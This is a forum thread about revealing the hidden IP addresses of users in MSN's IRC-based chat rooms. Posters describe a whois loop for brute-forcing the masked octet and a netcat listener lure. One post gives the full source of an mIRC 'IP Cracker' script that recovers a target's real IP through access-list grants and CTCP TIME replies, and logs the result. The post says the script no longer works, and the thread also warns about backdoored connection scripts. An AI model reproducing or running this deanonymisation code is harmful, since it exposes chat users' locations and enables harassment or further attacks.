Page 2 of 2 FirstFirst 12

Thread: IP Cracker

Antionline's Security Dude instronics's Avatar
    tampabay420, no. The gold host is the same as the @ in irc. The brown host is the same as % in irc (halfop). These are just channel hosts. They do not have an special priveleges on other channels or the server itself. The people in these rooms usually use 3rd party clients or scripts. Look at it this way. The AO irc. Once you go there, your ip is masked. Only the server operators and admins can see your real ip (unless you file transfer directly to another user). All the gold hammers and stuff is the same like irc, just a java decoration. The entire msn chat is nothing else but one large gui irc.

Cheers.
    Ubuntu-: Means in African : "Im too dumb to use Slackware"

pretty much any firewall/network connection monitor logs the ip of all incoming data packets, if he were monitoring, he could tracert the receit of a data packet recieved when you last said something in the chat. I had a friend who could tell me my ip, all the open ports i had, and any network services i was running, just from recieving an AIM message from me, because he downloaded a shareware program called AAtools, or Advanced Administrative Tools
    :q :q! :wq :w :w! :wq! :quit :quit! :help help helpquit quit quithelp :quitplease :quitnow :leave :**** ^X^C ^C ^D ^Z ^Q QUITDAMMIT ^[:wq GCS,M);d@;p;c++;l++;u ++ ;e+ ;m++(---) ;s+/+ ;n- ;h* ;f+(--) ;!g ;w+(-) ;t- ;r+(-) ;y+(**)

actually as an ex host on the old ircx msn servers, which i'm sure has changed with their new web interface but the old servers the hosts were able to see your entire unmasked ip address. There was also several methods of unmasking a users ip address that took only a few seconds.

On ircx servers when you enter a room everyone sees a your username as you come in with a portion that looks like... g00n@123.123.123.xx

now to unmask someone using an ircx server you need to do somthing like this..

xx denotes the number of digits in the last octet of their ip address... meaning it could be 10-99

do a for( xx = 10; xx<=99; xx++) {
    whois g00n@123.123.123.xx
    }

and the one that responds with my info would be my complete address.

this resolution got faster when people realized they could whois 30 entries at once, cutting the time down tremendously.

The last ip unmasker i wrote was able to get a persons ip address within 5 seconds.

now this is all assuming that a std ircx server, which i'm pretty sure you aren't what are running now.

As i abandoned msn chat once they moved to the new web interface, I cannot speak as to how their systems work. Whether a person is able to "script" with their client, or what information is displayed to the hosts in the room when a person enters.

I know that allowing the hosts to see a persons ip address in the past was done so that a host could ban a person more easily, without banning entire subnet and effecting other chatters.

i'd have to do some experimentation with msn chat to determine how difficult or easy it would be to get someone's ip address from what's available in the room.

Hey there could be mant things no how somwone could gain your IP # ....... I enjoy my cable modem ... But i would think by haveing a cable i would be more at a risk of geting hacked ... Because I think we have our assined IP address . It just dosent change every thime we log on the net . I think dail up modem users ip change around . But cable stays the same . but who knows .....

-Alpa

Obtaining your ip address in a chat room is very possible. Like said before did you click on a URL posted in the room ? Did you connect with anybody ? Somebody could have stup a netcat listener on port 80 , and sent you the link to their ip address. Once you try to connect to it , you will get an error message saying the page is unavailable etc. But on the other persons prompt he will see
    'Connection on port 80 from 10.*.*.* blah blah'
    Well this is just one way , but the people your explaining about don't sound that sophisticated.
    "Serenity is not the absence of conflict, but the ability to cope with it."

well as someone said theys scripts and clients for msn to go tho IRC to msn chat servers.which aint legal done tho.using an illegal chat control blah blah anyhow
    do u have a firewall by any chance? ive seen script kiddies go into msn chat rooms and post IP addy`s of chatters who didnt have firewalls but funny enough never posted ppl`s ip addy of ppl who had firewalls,

but are you sure someone told you your ip addy tho.since msn updated a few months ago
    when you connect to msn chatroom at the top it says

Please wait, connecting to server...
    Connected!
    Welcome to MSN Chat. Important: MSN does not control or endorse the content, messages or information found in chat. MSN specifically disclaims any liability with regard to these areas. To review the guidelines for use of MSN Chat, go to http://groups.msn.com/conduct.

Note: MSN has detected that you are connected to this chat session from the IP address xxx.xxx.xx.xxx

are you sure yr not getting this confused with someone telling u.amazing how many done when msn updated they servers.lol
    \"it is better to stay silent and appear stupid then to speak and remove all doubt\"

Since this is an old post, i would like to add to it (and change my prior statements), that indeed there is (was) a script addon to get an IP address in an msn chat room. Like i mentioned earlier, when using an irc client, and doing a whois on a user, it would reveal the gatekeeper address. Using that 'ipcracker' script it was able to get the real IP address. This HAS been patched though about 2 months ago. At this point, there is no ip cracker (in the wild that is) that will work. Also, msn lately has patched alot of things, making it hard for the so-called scripts to operate smoothley.

Below is one of the many ip crackers that "USED" to work on msn. NOW THEY DONT!!!

menu menubar,nicklist,channel {
    -
    ~|Name Hidden for privacy reasons ;) |~:dialog -md ip_crack ip_crack
    -
    }

dialog ip_crack {
    title "Hidden"
    size -1 -1 223 172
    option dbu
    list 1, 4 8 72 101, size
    list 2, 4 8 72 99, hide size
    button "Start", 3, 128 66 37 12, flat
    button "Stop", 4, 128 81 37 12, flat
    button "Clear", 5, 182 60 37 12, flat
    edit "", 6, 82 8 137 52, read multi autovs
    button "IP List", 8, 128 96 37 12, flat
    button "Done", 9, 170 96 37 12, flat ok
    edit "", 11, 4 114 215 10, read autohs center
    button "Clear", 12, 76 97 37 12, flat
    button "Refresh List", 13, 76 85 37 12, flat
    icon 15,0 0 223 172, $mircdirpics\IPcracker.bmp,index,top
    button "IP Ban", 16, 71 124 25 10, flat
    edit "-------Enter IP Here-------", 17, 4 124 67 10, autohs
    box "", 19, 167 89 43 22
    box "", 7, 125 59 43 52
    link " hidden" 18, 110 1 83 11,
    box "", 20, 109 -3 85 11
    button "Kick User", 21, 76 73 37 12, flat
    button "Help", 22, 170 78 37 12, flat
    }
    on *:dialog:ip_crack:*:*: {
    if ($devent == init) { var %x = 1 | while ($nick($active,%x)) { did -a ip_crack 1 $ifmatch | did -a ip_crack 2 $ifmatch | inc %x } | did -r ip_crack 6,11 }
    if ($devent == sclick) {
    if ($did == 1) { .did -c ip_crack 2 $did(1).sel }
    if ($did == 3) && ($did(1).seltext) { getip $did(2).seltext }
    if ($did == 4) { .timeripcheck off | .access $me clear | did -ra ip_crack 11 Halted }
    if ($did == 5) { did -r ip_crack 6 }
    if ($did == 8) { .run notepad logs\ip.log }
    if ($did == 9) { .timeripcheck off | .access $me clear }
    if ($did == 12) { did -r ip_crack 1,2 }
    if ($did == 13) { did -r ip_crack 1,2 | var %x = 1 | while ($nick($active,%x)) { did -a ip_crack 1 $ifmatch | did -a ip_crack 2 $ifmatch | inc %x } }
    if ($did == 16) { .access $chan add deny *!*@ $+ $did($dname,17 ).text : 4»15¤4« 11[124The 9Riddlebox 8Script's 0IP 12Cracker 4AutoBan11] 4»15¤4« }
    if ($did == 22) { run $mircdirtxt\ipcraxhelp.txt }
    if ($did == 21) { .kick # $nick : 4»15¤4« 11[124The 9Riddlebox 8Script's 0IP 12Cracker 4Kick11] 4»15¤4«
    }
    }
    if ($devent $did == dclick 1) { getip $did(2).seltext }
    }
    raw 801:*: { if ($1-2 == $me $me) && ($dialog(ip_crack)) did -a ip_crack 6 $4- $crlf | halt } | else { halt }
    raw 802:*: { if ($1-2 == $me $me) && ($dialog(ip_crack)) did -a ip_crack 6 $4- $crlf | halt } | else { halt }
    raw 820:*: { if ($1-2 == $me $me) && ($dialog(ip_crack)) did -a ip_crack 6 $4- $crlf | halt } | else { halt }
    on *:ctcpreply:*:{
    if ($1 == time) && ($nick == %ipuser) {
    inc %echotime
    if (%echotime >= 5) { did -ra ip_crack 11 [Cracked: $+ %lastgrant : still cracking....] | unset %echotime }
    .timeripcheck off
    .set %userip %userip $+ %ipnum
    .timeripcheck 1 1 nextip %ipnum
    did -a ip_crack 6 [Reply] $crlf
    halt
    }
    }
    alias getip {
    did -ra ip_crack 11 [Cracking $1 $+ 's ip]
    set %cticks $ticks
    unset %ipuser
    unset %iuchan
    unset %lastgrant
    unset %echotime
    unset %ipnum
    unset %userip
    unset %crackmode
    .set %ipuser $1
    .set %iuchan $active
    .access $me clear
    .access $me add deny $1
    .nextip
    }
    alias nextip {
    if ($1 == $chr(46)) {
    var %addr %userip $+ $1
    if ($numtok(%addr,46) > 3) && ($len($gettok(%addr,4,46)) == 3) {
    did -ra ip_crack 11 [Crack halted:Time: $+ $remove($duration($round($calc(($ticks - %cticks) / 1000),2)),ins,in,ecs,ec,$chr(32)) $+ :Logged ip: $+ %userip $+ ]
    .write logs\ip.log $time(h:nnt) $chr(9) %ipuser $chr(9) %userip
    unset %cticks
    .access $me clear
    halt
    }
    }
    if ($1 == $null) {
    .access $me add grant %ipuser $+ !*@1*
    .set %lastgrant 1
    .set %ipnum 1
    .timeripcheck 1 2 crackip
    .ctcp %ipuser TIME
    }
    elseif ($1 != $null) && ($right($1,1) != $chr(46)) {
    .access $me delete grant %ipuser $+ !*@ $+ %lastgrant $+ *
    .set %ipnum .
    .set %lastgrant %userip $+ %ipnum
    .access $me add grant %ipuser $+ !*@ $+ %lastgrant $+ *
    .ctcp %ipuser TIME
    }
    else {
    .set %ipnum 0
    .set %lastgrant %userip $+ %ipnum
    .ctcp %ipuser TIME
    }
    }
    alias crackip {
    if (%ipuser !ison %iuchan) { did -ra ip_crack 11 [User not found:Halted!] | .timeripcheck off | .access $me clear | halt }
    if (%ipnum == $chr(46)) {
    nextip .
    }
    elseif (%ipnum == 9) {
    did -ra ip_crack 11 [Crack halted:Time: $+ $remove($duration($round($calc(($ticks - %cticks) / 1000),2)),ins,in,ecs,ec,$chr(32)) $+ :Logged ip: $+ %userip $+ ]
    .write logs\ip.log $time(h:nnt) $chr(9) %ipuser $chr(9) %userip
    unset %cticks
    .access $me clear
    halt
    }
    else {
    inc %ipnum
    set %lastgrant %userip $+ %ipnum
    .ctcp %ipuser TIME
    }
    }
    alias ip dialog -md ip_crack ip_crack
    This is just an mIRC script that can be loaded into the popups section of mIRC.

I have edited out the authors name, and links to where more of these things can be found.

NOTE: I have only provided the source so that you may understand how it works. It works similar to 'John' (pass cracker for *nix systems).

It actually creates new ips and compares its gatekeeper results to the actuall gate keeper of the user itself.

There were 2 or 3 other similar scripts.

But like i said. MSN patched it. Maybe there is a handfull of people who have their own custom script which still works. But personally i really doubt that.

Furthermore, in order to use an mIRC script on msn, you need a connection script. MARK MY WORDS, ALL CONNECTION SCRIPTS ARE BACKDOORED.

The most famous of them is the so called vincula script (containing 3450 lines of code)

Have a look at lines 3004 upto 3086.

; :TK2CHATCHATA05 801 eXonyte %#eXonyte OWNER eXonyte*!*@*$* 0 4A63C43D06D38CB7@GateKeeperPassport :Reason
    raw 801:*: {
    if (!$dialog(msn.access. $+ $cid)) echo $color(mode) -t $2 * $1 adds $lower($3) access: $4 $iif($5 == 0,indefinitely,for $5 minutes) $+ $iif($7- != $null,$chr(44) reason given: $7-)
    haltdef
    }

; :TK2CHATCHATA05 802 eXonyte %#eXonyte OWNER eXonyte*!*@*$*
    raw 802:*: {
    if (!$dialog(msn.access. $+ $cid)) echo $color(mode) -t $2 * $1 deletes $lower($3) access: $4
    haltdef
    }
    This is only a short quote of the backdoor. It allows the maker of the script to gain full control of your client. The results are room takeovers, abuse of your scripts, and many other ugly things.

My advice....stay away from msn scripts unless you make it yourself.

Cheers.

ive noticed it recently, I think that only you see your IP address when you go into a room, so theres nothing to worry about,

It usually says connecting from ip adress xxx.xxx.xxx.xxx, its common place now i think IP adresses are logged and they show this, and maybe its in terms and conditions now about logging IP adresses, It all seemed to happen when they brought in the panicc buttons and report to admin faclitys to try and clamp down on pedophiles.

I dont think that MSN works the same as IRC its a different thing all together and that script will problably only work on IRC

i2c

i2c, msn is ircX (xtended irc)

This script did work on msn. Many people (including myself) connect to msn chat using mIRC.

Many of the common irc scripts work on msn. Msn chat is irc based Always has been.

This specific script i quoted worked on msn until about 2 months ago, when they updated their servers.